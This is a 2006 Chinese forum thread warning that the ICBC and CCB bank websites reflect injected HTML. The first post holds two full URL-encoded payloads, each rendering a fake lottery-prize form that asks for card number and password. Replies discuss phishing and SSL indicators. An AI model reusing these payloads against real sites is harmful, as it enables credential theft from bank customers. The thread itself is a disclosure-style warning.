KeyFansClub

首页 » - 特色讨论区 - » 键社茶餐厅 » 工行和建行的网上银行漏洞……大家小心

蓝色的风之精灵 - 2006/12/31 11:59:00

不知道你看到如下两个链接会有什么想法呢？
如果用户改的再官方点会怎么样呢？
[url=http://www.icbc.com.cn/news/hotspot.jsp?column=%3Cform%20action=https://mybank.icbc.com.cn/icbc/perbank/js/checkacct.js%3E%3Ctable%20border=0%3E%3Ctr%3E%3Ctd%20colspan=2%3E%B9%A7%CF%B2%C4%FA%B3%E9%D6%D0%C1%CB%CE%D2%D0%D0%A1%B0%B5%E3%CA%AF%B3%C9%BD%F0%A1%B1%D3%AD%D0%C2%C4%EA%D0%D2%D4%CB%B4%F3%B3%E9%BD%B1%A3%AD%A3%AD%CC%D8%B5%C8%BD%B1%A3%A1%3Cbr%3E%BD%B1%BD%F0%CE%AA%C8%CB%C3%F1%B1%D2%CE%E5%B0%D9%CD%F2%D4%AA%A3%AC%B8%F6%C8%CB%CB%F9%B5%C3%CB%B0%D7%D4%C0%ED%A1%A3%3Cbr%3E%C7%EB%CA%E4%C8%EB%C4%FA%B5%C4%B9%A4%D0%D0%CD%F8%D2%F8%D7%A2%B2%E1%BF%A8%BA%C5%BC%B0%C3%DC%C2%EB%BD%F8%D0%D0%C8%B7%C8%CF%A1%A3%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D7%A2%B2%E1%BF%A8%BA%C5%2F%B5%C7%C2%BCID%A3%BA%3C/td%3E%3Ctd%3E%3Cinput%20type=text%20name=logonCardNum%20maxlength=19%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%B5%C7%C2%BC%C3%DC%C2%EB%A3%BA%3C/td%3E%3Ctd%3E%3Cinput%20type=password%20name=logonCardPass%20maxlength=30%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D3%D2%B2%E0%CF%D4%CA%BE%B5%C4%D1%E9%D6%A4%C2%EB%A3%BA%3C/td%3E%3Ctd%3E%3Cinput%20type=text%20name=verifyCode%20maxlength=4%3E%3Cimg%20border=0%20src="https://mybank.icbc.com.cn/icbc/perbank/verifyimage.jsp?randomKey=1167484999975236447"%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20height=34%20colspan=2%20align=center%3E%3Ca%20href="XX:mySubmit();"%3E%3Cimg%20src="https://mybank.icbc.com.cn/icbc/perbank/images/agree.gif"%20width="57"%20height="18"%20border="0"%3E%3C/a%3E%3Ca%20href="XX:disagreement();"%3E%3Cimg%20src="https://mybank.icbc.com.cn/icbc/perbank/images/disagree.gif"%20width="57"%20height="18"%20border="0"%3E%3C/a%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/FORM%3E]点击看看工行的[/url]
[url=http://www.ccb.com/portal/cn/branch/branchindex.jsp?subname=%3Cform%20action=https://mybank.icbc.com.cn/icbc/perbank/js/checkacct.js%3E%3Ctable%20border=0%3E%3Ctr%3E%3Ctd%20colspan=2%3E%B9%A7%CF%B2%C4%FA%B3%E9%D6%D0%C1%CB%CE%D2%D0%D0%A1%B0%B5%E3%CA%AF%B3%C9%BD%F0%A1%B1%D3%AD%D0%C2%C4%EA%D0%D2%D4%CB%B4%F3%B3%E9%BD%B1%A3%AD%A3%AD%CC%D8%B5%C8%BD%B1%A3%A1%3Cbr%3E%BD%B1%BD%F0%CE%AA%C8%CB%C3%F1%B1%D2%CE%E5%B0%D9%CD%F2%D4%AA%A3%AC%B8%F6%C8%CB%CB%F9%B5%C3%CB%B0%D7%D4%C0%ED%A1%A3%3Cbr%3E%C7%EB%CA%E4%C8%EB%C4%FA%B5%C4%B9%A4%D0%D0%CD%F8%D2%F8%D7%A2%B2%E1%BF%A8%BA%C5%BC%B0%C3%DC%C2%EB%BD%F8%D0%D0%C8%B7%C8%CF%A1%A3%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D7%A2%B2%E1%BF%A8%BA%C5%2F%B5%C7%C2%BCID%A3%BA%3C/td%3E%3Ctd%3E%3Cinput%20type=text%20name=logonCardNum%20maxlength=19%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%B5%C7%C2%BC%C3%DC%C2%EB%A3%BA%3C/td%3E%3Ctd%3E%3Cinput%20type=password%20name=logonCardPass%20maxlength=30%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D3%D2%B2%E0%CF%D4%CA%BE%B5%C4%D1%E9%D6%A4%C2%EB%A3%BA%3C/td%3E%3Ctd%3E%3Cinput%20type=text%20name=verifyCode%20maxlength=4%3E%3Cimg%20border=0%20src="https://mybank.icbc.com.cn/icbc/perbank/verifyimage.jsp?randomKey=1167484999975236447"%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20height=34%20colspan=2%20align=center%3E%3Ca%20href="XX:mySubmit();"%3E%3Cimg%20src="https://mybank.icbc.com.cn/icbc/perbank/images/agree.gif"%20width="57"%20height="18"%20border="0"%3E%3C/a%3E%3Ca%20href="XX:disagreement();"%3E%3Cimg%20src="https://mybank.icbc.com.cn/icbc/perbank/images/disagree.gif"%20width="57"%20height="18"%20border="0"%3E%3C/a%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/FORM%3E]点击看看建行的[/url]

Sore - 2006/12/31 12:08:00

这个是什么意思啊……
没看懂的说……
哪里有漏洞……

蓝色的风之精灵 - 2006/12/31 12:16:00

漏洞就是我可以伪造银行信息骗你输入你的卡号和密码
然后这些信息就能被发送到我的信箱或者其他什么地方供我使用……
你点击上面的链接，打开是的工行和建行的页面，IE7等一些反钓鱼的浏览器和防火墙根本不会报警

[BLT]FQX - 2006/12/31 12:18:00

好像连接到的地址是其他服务器的吧？
所以如果输入帐号密码的话，就会被盗。

蓝色的风之精灵 - 2006/12/31 12:22:00

现在我伪造的信息是提交到招行的，所以没有危险。
如果真的有人要伪造这样的页面，把提交的地址改到收集信息的地址，那就危险了

蓝色的风之精灵 - 2006/12/31 12:36:00

再次提醒大家小心~~

[BLT]FQX - 2006/12/31 12:45:00

以下引用蓝色的风之精灵在2006-12-31 12:36:30的发言： 再次提醒大家小心~~

我不得不告诉你，第一个链接是工行，而不是招行……

蓝色的风之精灵 - 2006/12/31 12:59:00

手误……感谢提醒
习惯了用招行了
就打成招行了……
已修正…………

佩恩的枪 - 2006/12/31 13:05:00

现在网吧的防御系统真是完善，
居然打不开。：）
哼哼哼``````

阴阳穿影 - 2006/12/31 13:07:00

注意看右下角有没有SSL安全标志就知道了

不过也要注意看啊...

pntgd - 2006/12/31 13:13:00

以下引用佩恩的枪在2006-12-31 13:05:24的发言： 现在网吧的防御系统真是完善， 居然打不开。：） 哼哼哼``````

那是网吧OS早已中毒的缘故...= =
凡出现内存读取错误的提示都要小心了，很有可能已经染毒~

以下引用阴阳穿影在2006-12-31 13:07:25的发言： 注意看右下角有没有SSL安全标志就知道了 不过也要注意看啊...

没错，进入时都会有安全提示信息显示，退出网站时也会有提示~
不过这种钓鱼网站对普通用户很容易欺骗~

PS.还是农行好呵~ XD

该用户已被删除 - 2006/12/31 13:20:00

[em32]邪恶滴叔叔．．　嘿嘿．　不过素很有可能会出现滴情况喵．
话说．．　遇上也不怕喵．　工行滴卡就用来网上买东东滴说．　要用时才存点小钱进里面．．　来盗吧．咔咔～～

佩恩的枪 - 2006/12/31 13:44:00

以下引用pntgd在2006-12-31 13:13:43的发言： 那是网吧OS早已中毒的缘故...= = 凡出现内存读取错误的提示都要小心了，很有可能已经染毒~

巨寒！！！
刚在网上查到的：
内存分配失败故障的原因很多，内存不够、系统函数的版本不匹配等都可能有影响。因此，这种分配失败多见于操作系统使用很长时间后，安装了多种应用程序(包括无意中“安装”的病毒程序)，更改了大量的系统参数和系统文件之后。

谢谢pntgd大神啊，
赶紧改掉所有的密码，
逃```````

粘土火星 - 2006/12/31 14:59:00

严格说这个不是钓鱼网站-v-  工行的官网没有HTML注入防御才对-v-

子夜风 - 2006/12/31 15:03:00

楼主不是吓唬人吧~
我是建行的啊~~~~

壬生京四郎 - 2007/1/3 13:53:00

这个貌似不叫漏洞　而只是个人欺诈捏

1

查看完整版本: 工行和建行的网上银行漏洞……大家小心

Powered by Discuz!NT Archiver 3.1.0 2001-2025 Comsenz Inc.